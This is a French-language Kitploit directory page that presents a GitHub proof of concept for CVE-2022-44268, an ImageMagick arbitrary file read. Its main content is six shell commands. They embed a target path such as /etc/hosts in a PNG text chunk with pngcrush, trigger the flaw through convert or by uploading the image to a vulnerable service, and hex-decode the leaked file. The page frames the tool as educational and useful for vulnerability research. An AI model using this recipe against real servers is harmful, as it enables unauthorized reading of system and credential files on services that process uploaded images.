Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC — CVE-2022-44268 ImageMagick Lecture arbitraire de fichier - Générateur de payload | Kitploit
Outils/GitHubGitHub/duc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubduc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc

CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

CVE-2022-44268 ImageMagick Lecture arbitraire de fichier - Générateur de payload

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
27537il y a 3 ansVérifié par Kitploit

CVE-2022-44268 ImageMagick PoC de lecture arbitraire de fichier

PoC pour CVE-2022-44268 ImageMagick Arbitrary File Read PoC - Générateur de payload

Ce projet est créé uniquement à des fins éducatives et ne peut être utilisé pour enfreindre la loi ou pour un gain personnel.

L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les contenus de ce projet.

Découverte d'origine : https://www.metabaseq.com/imagemagick-zero-days/

Utilisation :

Installation des dépendances :

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

Modifiez le nom du fichier que vous souhaitez lire ci-dessous :

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

Confirmez que tout a fonctionné parfaitement

3. $ exiv2 -pS pngout.png

Déclenchez le PoC via convert ou en téléversant l'image vers le service vulnérable :

4. $ convert pngout.png gopro.png

Affichez le contenu du fichier lu :

5. $ identify -verbose gopro.png

Déchiffrez le contenu :

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

Démo

Testé avec Ubuntu 22.04 et ImageMagick installé par défaut.

Télécharger l’outil